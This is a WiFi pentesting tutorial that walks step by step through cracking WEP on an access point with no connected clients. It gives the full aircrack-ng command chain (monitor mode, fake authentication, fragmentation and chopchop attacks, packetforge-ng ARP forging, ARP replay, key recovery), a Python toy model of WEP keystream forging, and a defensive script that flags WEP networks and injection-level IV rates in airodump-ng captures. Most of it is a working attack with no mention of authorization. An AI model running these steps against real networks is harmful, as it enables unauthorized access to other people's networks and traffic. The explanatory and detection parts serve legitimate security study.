WIFI PENTESTING : HACK WEP ENCRYPTED WIFI WITH NO CONNECTED CLIENTS

This tutorial explains how easy it is to bypass the WEP encryption of a Wi-Fi network that has no connected clients. WEP encryption is very easy to bypass, and it does not matter whether a client is connected to the access point or not. In this video we are going to show the fragmentation attack; it may not work on some routers, but if this one fails, another (like chopchop) will surely work, which I will demonstrate in coming videos. Hence you are nowhere safe with WEP.
The main objective is to capture IVs (#Data). But since there is no connected client, the AP will not be transmitting data, and hence we need the chopchop or fragmentation attack to speed things up.
For details, check the video below, which explains everything step by step.

We are going to discuss two methods of hacking WEP with no connected clients :
1. Chopchop Attack
2. Fragmentation Attack

Okay, open a TERMINAL :

1. Type " airmon-ng check kill "

2. Type " airmon-ng start wlan0 "

3. Type " airodump-ng wlan0mon "
Press CTRL+C once you see your target router in the list.

4. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
CH is the channel of the target.
BSSID is the MAC address of the target.
dumpfile is the prefix of the .cap file in which captured data will be saved (airodump-ng appends a number, so the file is actually dumpfile-01.cap); name it as you like.
Open a new TERMINAL.

5. Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Success looks like this:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

6. In this step we will use the chopchop attack or the fragmentation attack to obtain the PRGA.
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets is covered later in the tutorial.
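To make the PRGA point concrete, here is an added illustration that is not part of the tutorial or of aircrack-ng: a toy WEP model over raw bytes (no 802.11 framing) showing why a keystream recovered for one IV, with no knowledge of the key, is enough to build a packet the access point will accept, and why the keystream is still not the key. The key, IV and payloads are constructed sample values; the function names are mine.

```python
# Added illustration (not part of the tutorial): why a recovered keystream
# (what aircrack-ng calls the PRGA .xor file) is enough to build a valid WEP
# packet without the key. Toy model over raw bytes, no 802.11 framing; key,
# IV and payloads are constructed sample values.
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key scheduling followed by pseudo-random generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    # WEP's integrity value is a plain CRC-32: unkeyed, so anyone can compute it.
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Per-packet RC4 key is IV || shared key; the 3-byte IV travels in clear.
    body = plaintext + icv(plaintext)
    return iv + xor_bytes(rc4_keystream(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok) for a frame laid out as iv || ciphertext."""
    iv, ct = frame[:3], frame[3:]
    body = xor_bytes(rc4_keystream(iv + key, len(ct)), ct)
    pt, tag = body[:-4], body[-4:]
    return pt, tag == icv(pt)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    # The property the chopchop/fragmentation attacks rely on: ciphertext XOR
    # a known plaintext (plus its CRC) yields the keystream for this IV.
    body = known_plaintext + icv(known_plaintext)
    return xor_bytes(frame[3:], body)


def forge_with_keystream(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    # Reuse the keystream under the same IV for a different payload; the key
    # is never needed. This is the step packetforge-ng performs with the .xor file.
    body = new_plaintext + icv(new_plaintext)
    if len(body) > len(keystream):
        raise ValueError("keystream shorter than the packet to forge")
    return iv + xor_bytes(keystream[: len(body)], body)


def demo():
    key = b"\x01\x02\x03\x04\x05"  # constructed 40-bit WEP key
    iv = b"\x0c\xad\x42"            # constructed IV
    known = b"ARP who-has 10.0.0.1? tell 10.0.0.9"  # predictable plaintext
    frame = wep_encrypt(key, iv, known)
    ks = recover_keystream(frame, known)            # no key involved
    forged = forge_with_keystream(iv, ks, b"ARP who-has 10.0.0.254? tell")
    pt, valid = wep_decrypt(key, forged)            # the AP would accept this
    # The keystream covers only this IV: there are just 2**24 IVs, so the
    # same keystream comes back around on any busy network.
    return pt, valid, ks == rc4_keystream(iv + key, len(ks))


if __name__ == "__main__":
    print(demo())
```

The demo returns the forged plaintext as the access point would decrypt it, `True` for a valid ICV, and `True` confirming the recovered bytes equal the real keystream for that IV. The two design flaws on display are the unkeyed CRC-32 integrity check and the 24-bit IV, which together are why no amount of key length helps WEP.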

I am going to cover fragmentation attack first.

Type " aireplay-ng -5 -b BSSID -h MACADD wlan0mon "

where
  • -5 means the fragmentation attack
  • -b BSSID is the access point MAC address
  • -h MACADD is the MAC address of our card and must match the MAC used in the fake authentication
The system will respond :


Use this packet ? y <ENTER>

When successful the system responds :


The fragment-XXXXXXX.xor file will be used in the next step to generate an ARP packet.

Chopchop attack: if the fragmentation attack fails, try the chopchop attack instead.

Type " aireplay-ng -4 -b BSSID -h MACADD wlan0mon "

7. Type " packetforge-ng -0 -a BSSID -h MACADD -k 255.255.255.255 -l 255.255.255.255 -y xorfile -w arp-request "

where
  • -0 means generate an ARP packet
  • -a BSSID is the access point MAC address
  • -h MACADD is MAC address of our card
  • -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
  • -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
  • -y xorfile is the file to read the PRGA from (NOTE: replace xorfile with the actual fragment-XXXXXXX.xor file name written out in step 6 above)
  • -w arp-request is the name of the file to write the ARP packet to
8. Type " aireplay-ng -2 -h MACADD -r arp-request wlan0mon "


Use this packet ? y <ENTER>
The #Data count will now increase dramatically.

9. Open a new TERMINAL.

Type " aircrack-ng dumpfile " (the .cap file written in step 4)

That's it!
Aircrack will reveal the key as soon as it gets sufficient IVs.
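For the defender, the same airodump-ng capture is the place to look: step 4 writes a CSV beside the .cap (dumpfile-01.csv) listing every access point seen, its Privacy field and its IV count. The following added example, not part of the tutorial or of aircrack-ng, parses a CSV constructed in that layout and flags networks still on WEP or open, and a WEP network whose IV rate looks like the "#Data increases dramatically" phase of step 8. The threshold INJECTION_IV_RATE is my assumption; the BSSIDs, ESSIDs and counts are constructed.

```python
# Added defensive example (not part of the tutorial): audit the CSV that
# airodump-ng writes beside the .cap for networks still on WEP and for IV
# rates consistent with an injection attack in progress. The CSV below is
# constructed in airodump-ng's column layout; the threshold is an assumption.
import csv
import io
from datetime import datetime

TIME_FMT = "%Y-%m-%d %H:%M:%S"
INJECTION_IV_RATE = 200.0   # IVs per second; heuristic threshold (assumption)

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2015-02-03 18:00:01, 2015-02-03 18:05:01,  6,  54, WEP , WEP ,     , -40,     3000,     1500,   0.  0.  0.  0,   8, LabWEP-1, 
AA:BB:CC:00:00:02, 2015-02-03 18:03:00, 2015-02-03 18:05:00, 11,  54, WEP , WEP ,     , -52,     1200,    60000,   0.  0.  0.  0,   8, LabWEP-2, 
AA:BB:CC:00:00:03, 2015-02-03 18:00:01, 2015-02-03 18:05:01,  1,  54, WPA2, CCMP, PSK , -61,     3000,        0,   0.  0.  0.  0,   7, LabWPA2, 
AA:BB:CC:00:00:04, 2015-02-03 18:00:01, 2015-02-03 18:05:01,  1,  54, OPN , , , -70, 3000, 0, 0. 0. 0. 0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2015-02-03 18:03:00, 2015-02-03 18:05:00, -30,  60500, AA:BB:CC:00:00:02, 
"""


def parse_access_points(text: str) -> list:
    """Return the access-point rows as dicts keyed by the CSV header names."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header, aps = None, []
    for row in reader:
        row = [field.strip() for field in row]
        if not row or row == [""]:
            if header:            # blank line separates APs from the station table
                break
            continue
        if header is None:
            header = row
        elif row[0] == "Station MAC":
            break
        else:
            aps.append(dict(zip(header, row)))
    return aps


def iv_rate(ap: dict) -> float:
    """IVs captured per second over the interval the AP was observed."""
    first = datetime.strptime(ap["First time seen"], TIME_FMT)
    last = datetime.strptime(ap["Last time seen"], TIME_FMT)
    seconds = max((last - first).total_seconds(), 1.0)
    return int(ap["# IV"]) / seconds


def audit(aps: list) -> list:
    """Produce one finding dict per weakness; empty list means nothing to report."""
    findings = []
    for ap in aps:
        tag = {"bssid": ap["BSSID"], "essid": ap["ESSID"]}
        privacy = ap["Privacy"]
        if "WEP" in privacy:
            findings.append({**tag, "issue": "WEP in use: key is recoverable from captured IVs; migrate to WPA2/WPA3"})
            rate = iv_rate(ap)
            if rate > INJECTION_IV_RATE:
                findings.append({**tag, "issue": f"IV rate {rate:.0f}/s: consistent with active ARP replay injection"})
        elif privacy == "OPN":
            findings.append({**tag, "issue": "open network: traffic is unencrypted"})
    return findings


if __name__ == "__main__":
    for finding in audit(parse_access_points(SAMPLE_CSV)):
        print(f"{finding['bssid']}  {finding['essid']:<10} {finding['issue']}")
```

On the constructed data the first WEP network is merely weak (5 IVs/s is ordinary background traffic), while the second shows 500 IVs/s over two minutes, which an idle WEP network with no clients never produces on its own. Swap `SAMPLE_CSV` for the contents of a real dumpfile-01.csv to run it against your own capture.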


